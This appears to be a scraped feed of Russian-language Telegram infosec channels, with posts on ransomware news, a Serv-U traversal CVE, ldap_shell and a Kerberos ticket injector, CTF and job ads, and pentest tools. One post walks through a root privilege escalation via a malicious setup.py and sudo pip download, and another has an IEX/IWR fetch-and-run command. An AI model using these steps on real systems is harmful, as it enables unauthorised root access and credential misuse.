Forwarded from Private Shizo
💥Nokoyawa ransomware attacks with Windows zero-day
In February 2023, Kaspersky technologies detected a number of attempts to execute similar elevation-of-privilege exploits on Microsoft Windows servers belonging to small and medium-sized businesses in the Middle East, in North America, and previously in Asia regions.
This is the one bug(CVE-2023-28252) under active attack this month, and if it seems familiar, that’s because there was a similar 0-day patched in the same component just two months ago. To me, that implies the original fix was insufficient and attackers have found a method to bypass that fix. As in February, there is no information about how widespread these attacks may be. This type of exploit is typically paired with a code execution bug to spread malware or ransomware.
In February 2023, Kaspersky technologies detected a number of attempts to execute similar elevation-of-privilege exploits on Microsoft Windows servers belonging to small and medium-sized businesses in the Middle East, in North America, and previously in Asia regions.
This is the one bug(CVE-2023-28252) under active attack this month, and if it seems familiar, that’s because there was a similar 0-day patched in the same component just two months ago. To me, that implies the original fix was insufficient and attackers have found a method to bypass that fix. As in February, there is no information about how widespread these attacks may be. This type of exploit is typically paired with a code execution bug to spread malware or ransomware.
❤1
👨💻 Начинаешь карьеру в информационной безопасности? Приходи на оплачиваемую стажировку ВТБ — Школу по информационной безопасности!
⚡️ За 3 месяца ты получишь знания от экспертов ВТБ, опыт работы в топовой компании + навыки, необходимые для дальнейшего роста. Ну и конечно, конкурентную зарплату, ДМС со стоматологией, скидки от партнеров и многое-многое другое!
А еще:
— возможность перейти в штат по итогам стажировки с повышением оклада;
— надежную и стабильную работу в одном из крупнейших банков страны;
— нетворкинг и погружение в профессиональное комьюнити;
— обучение 40% времени, чтобы твои знания оставались самыми востребованными!
👾 Успей зарегистрироваться на стажировку: https://bit.ly/infosec-intern-VTB
#промо
⚡️ За 3 месяца ты получишь знания от экспертов ВТБ, опыт работы в топовой компании + навыки, необходимые для дальнейшего роста. Ну и конечно, конкурентную зарплату, ДМС со стоматологией, скидки от партнеров и многое-многое другое!
А еще:
— возможность перейти в штат по итогам стажировки с повышением оклада;
— надежную и стабильную работу в одном из крупнейших банков страны;
— нетворкинг и погружение в профессиональное комьюнити;
— обучение 40% времени, чтобы твои знания оставались самыми востребованными!
👾 Успей зарегистрироваться на стажировку: https://bit.ly/infosec-intern-VTB
#промо
🗿5🔥3
Forwarded from BI.ZONE Bug Bounty
Встречайте новую программу от Timeweb — одного из крупнейших облачных провайдеров России!
Вилка выплат — от 10 000 до 250 000 рублей. Стоимость бага зависит от критичности и домена.
Скоуп в этот раз просто огромный: одного поста не хватит, чтобы перечислить все.
Так что смотрите список доменов и прайс на нашей платформе!
Please open Telegram to view this post
VIEW IN TELEGRAM
Serv-U [v.15.3.0.X] Directory-Traversal
CVE-2021-35250
Уязвимость позволяет удаленному пользователю выполнить атаку Directory Traversal, отправив специально созданный HTTP запрос и прочитав произвольные файлы в системе. Чтение файлов возможно только на диске
Известно 3 варианта того, какие файлы и как может читать злоумышленник:
1. Файлы Windows по умолчанию. Пример: "
2. Обнаружение файлов с помощью брутфорса;
3. Определение путей к файлам в файлах Windows по умолчанию или используемого программного обеспечения на сервере.
CVE-2021-35250
Уязвимость позволяет удаленному пользователю выполнить атаку Directory Traversal, отправив специально созданный HTTP запрос и прочитав произвольные файлы в системе. Чтение файлов возможно только на диске
C:\, злоумышленник может получить информацию о файловом сервере, только зная путь к файлам. Известно 3 варианта того, какие файлы и как может читать злоумышленник:
1. Файлы Windows по умолчанию. Пример: "
C:\Windows\win.ini";2. Обнаружение файлов с помощью брутфорса;
3. Определение путей к файлам в файлах Windows по умолчанию или используемого программного обеспечения на сервере.
🔥5
LDAP shell
Этот проект является форком проекта ldap_shell - impacket.
Подготовка:
ldap_shell.py
Этот проект является форком проекта ldap_shell - impacket.
Подготовка:
sudo apt install -y python3
Установка:git clone https://github.com/z-Riocool/ldap_shell.git ;cd ldap_shell ; python3 -m pip install .
Пример использования:ldap_shell.py
domain.local/user:password
ldap_shell domain.local/user:password -dc-ip 192.168.1.2
ldap_shell domain.local/user -hashes aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404e1
export KRB5CCNAME=/home/user/ticket.ccache
ldap_shell -k -no-pass domain.local/user
#tools22 апреля пройдет task-based КибХак CTF совместно с mireaCTF (Potee) в режиме онлайн.
👻 За призовые места вы сможете получить фирменные стикеры КибХак и ценные денежные призы. В том числе по результатам соревнований будут вручены проходки на предстоящую конференцию Positive Hack Days 12. А также, возможно, одна из команд сможет пойти на пхд и посоревноваться там 😊
Правила те же, что и всегда: команды решают задания по информационной безопасности и получают «флаги», за которые начисляются баллы.
❗️ Начало в 18:00
👨💻 Длительность 18 часов до 12:00 воскресенья
Будут представлены задачи следующих категорий:
crypto, forensics, misc, osint, reverse, stego, web
В каждой команде должно быть не более 5-ти человек
Вся информация будет в канале mireaCTF:
https://t.me/mireactf
И в беседах КибХак и mireaCTF:
https://t.me/+TS7yGrOwxSJZP8Q3
https://t.me/+SFTJE5BHTJ0PoHq4
Регистрация уже доступна на:
https://ctf.potee.ru
👻 За призовые места вы сможете получить фирменные стикеры КибХак и ценные денежные призы. В том числе по результатам соревнований будут вручены проходки на предстоящую конференцию Positive Hack Days 12. А также, возможно, одна из команд сможет пойти на пхд и посоревноваться там 😊
Правила те же, что и всегда: команды решают задания по информационной безопасности и получают «флаги», за которые начисляются баллы.
❗️ Начало в 18:00
👨💻 Длительность 18 часов до 12:00 воскресенья
Будут представлены задачи следующих категорий:
crypto, forensics, misc, osint, reverse, stego, web
В каждой команде должно быть не более 5-ти человек
Вся информация будет в канале mireaCTF:
https://t.me/mireactf
И в беседах КибХак и mireaCTF:
https://t.me/+TS7yGrOwxSJZP8Q3
https://t.me/+SFTJE5BHTJ0PoHq4
Регистрация уже доступна на:
https://ctf.potee.ru
🔥2🐳1🗿1
Forwarded from RedTeam brazzers (Миша)
Injector.png
1.1 MB
Итак, продолжаем заниматься импортозамещением учиться быть настоящим Red Team'ом и не использовать mimikatz! Недавно у меня вышла статья по инжекту тикетов с помощью плюсовой программы. Но потом мы вспоминаем об антивирусах и становится не так весело. Каждый раз брать проект, добавлять защиту, перекомпиливать... не вариант.
Поэтому появилась идея создания инжектора билетов на Powershell. Во-первых, это удобно, во-вторых, защищать и обфусцировать намного быстрее. Есть как готовые фреймворки , так и статьи с инструкциями.
Результатом работы стал небольшой скрипт, который должен помочь атакующему во время тестирования на проникновение. Теперь вы можете инжектить тикеты, используя Powershell! Поддерживаются два режима работы:
1. Инжект тикета, предоставленного в файле .kirbi
2. Инжект тикета, предоставленного в формате base64
Полный код можно увидеть на моем гитхабе
По любым вопросам, болячкам и возможным недочетам тулзы смело пишите мне :)
Поэтому появилась идея создания инжектора билетов на Powershell. Во-первых, это удобно, во-вторых, защищать и обфусцировать намного быстрее. Есть как готовые фреймворки , так и статьи с инструкциями.
Результатом работы стал небольшой скрипт, который должен помочь атакующему во время тестирования на проникновение. Теперь вы можете инжектить тикеты, используя Powershell! Поддерживаются два режима работы:
1. Инжект тикета, предоставленного в файле .kirbi
2. Инжект тикета, предоставленного в формате base64
Полный код можно увидеть на моем гитхабе
По любым вопросам, болячкам и возможным недочетам тулзы смело пишите мне :)
Forwarded from Monkey Hacker
Privilege Escalation via pip
Всеми наш любимый
После того, как мы сделали
Сначала скопируем нужный нам репозиторий
Затем давайте сделаем некоторые изменения в файле
Собираем
И скачиваем наш пакет
И теперь запустим шелл
Have fun👍
P.S
Полный код в комментариях
THX:
Всеми наш любимый
pip позволяет автоматически запускать код, когда разработчики просто загружают пакет. Таким образом мы можем скачать пакет и использовать эту возможность для повышения привилегийПосле того, как мы сделали
sudo -l. Мы видим, что pip download или pip setup можно запустить от sudo, так что давайте этим воспользуемся.Сначала скопируем нужный нам репозиторий
Затем давайте сделаем некоторые изменения в файле
setup.py. Импортируем os для запуска наших команд и в функции RunCommand поместим os.system("chmod u+s /bin/bash").Собираем
python3 -m buildИ скачиваем наш пакет
sudo pip3 download http://localhost/your-file.tar.gzИ теперь запустим шелл
bash -pHave fun
P.S
Полный код в комментариях
THX:
https://medium.com/checkmarx-security/automatic-execution-of-code-upon-package-download-on-python-package-manager-cd6ed9e366a8Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - wunderwuzzi23/this_is_fine_wuzzi: Demo of a malicious python package that will run code upon pip download or install
Demo of a malicious python package that will run code upon pip download or install - wunderwuzzi23/this_is_fine_wuzzi
❤3🐳1
Atomic Red Team
Всем привет! Извиняюсь, что давно не делал посты, загружен всем подряд. Постараюсь исправиться)
Я думаю многие из нас знакомы с Atomic Red Team. Но если нет, то давайте кратко пройдемся. Это некая библиотека PowerShell скриптов основанная на MITRE. Данный фреймворк предназначен не только для красной команды, но и для защитников, которые желают проверить свои же средства защиты. Этот фреймворк является самым популярным и полным "чек-листом" для проверки ИБ вашей рабочей среды.
Atomic Red Team предназначен не только для Windows, но и Linux + MacOS. Так что вы можете протестировать всё что вам нужно)
Команда для импорта тестов:
Пример запуска тестов:
Для безумцев:
#tools
Всем привет! Извиняюсь, что давно не делал посты, загружен всем подряд. Постараюсь исправиться)
Я думаю многие из нас знакомы с Atomic Red Team. Но если нет, то давайте кратко пройдемся. Это некая библиотека PowerShell скриптов основанная на MITRE. Данный фреймворк предназначен не только для красной команды, но и для защитников, которые желают проверить свои же средства защиты. Этот фреймворк является самым популярным и полным "чек-листом" для проверки ИБ вашей рабочей среды.
Atomic Red Team предназначен не только для Windows, но и Linux + MacOS. Так что вы можете протестировать всё что вам нужно)
Команда для импорта тестов:
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing); Install-AtomicRedTeam
Далее советую вам обратиться к этой и этой странице документации. Вы можете загрузить все тесты, но лучше конечно под конкретную операционную систему) Пример запуска тестов:
Invoke-AtomicTest T1003.003 - просто запуск теста или группы тестовInvoke-AtomicTest T1003.003 -TestNumbers 1,2 - вы выбрали только 1 и 2 тесты из группыInvoke-AtomicTest T1003.003 -ShowDetails - вы сможете прочитать подробную информацию о конкретном тесте/ахДля безумцев:
Invoke-AtomicTest All
Также советую вам посмотреть интересное видео от наших западных коллег об этом прекрасном инструменте)#tools
YouTube
How To Test Your Security with Atomic Red Team
https://jh.live/pwyc || Jump into Pay What You Can training for more free labs just like this! https://jh.live/pwyc
00:42 - Context
01:27 - Setup
02:57 - Begin
04:32 - Atomic Red Team Demo
05:49 - Starting Atomic Red Team
07:42 - Results
09:26…
00:42 - Context
01:27 - Setup
02:57 - Begin
04:32 - Atomic Red Team Demo
05:49 - Starting Atomic Red Team
07:42 - Results
09:26…
❤6👍1
Media is too big
VIEW IN TELEGRAM
🔴PentestGPT
Дада, снова речь про ChatGPT, но стой, не закрывай канал. В данном случае ChatGPT выступает именно в роли помощника в пентесте. Ты задаешь ей цель, она тебе расписывает шаги для пентеста. Далее вы сами выполняете сканирование, скидываете результаты обратно ChatGPT и она анализирует ваши результаты. Звучит довольно круто, не правда ли?)
Пока ещё проект находится на стадии разработки, но вы уже можете оценить результаты на гитхабе разработчика. К посту прикреплено видео с "демонстрацией силы" бота.
По установке в посте её будет сложно уместить, так что советую перейти к гитхаб и там изучить её досконально.
#chatgpt #tools
Дада, снова речь про ChatGPT, но стой, не закрывай канал. В данном случае ChatGPT выступает именно в роли помощника в пентесте. Ты задаешь ей цель, она тебе расписывает шаги для пентеста. Далее вы сами выполняете сканирование, скидываете результаты обратно ChatGPT и она анализирует ваши результаты. Звучит довольно круто, не правда ли?)
Пока ещё проект находится на стадии разработки, но вы уже можете оценить результаты на гитхабе разработчика. К посту прикреплено видео с "демонстрацией силы" бота.
По установке в посте её будет сложно уместить, так что советую перейти к гитхаб и там изучить её досконально.
#chatgpt #tools
❤6🔥1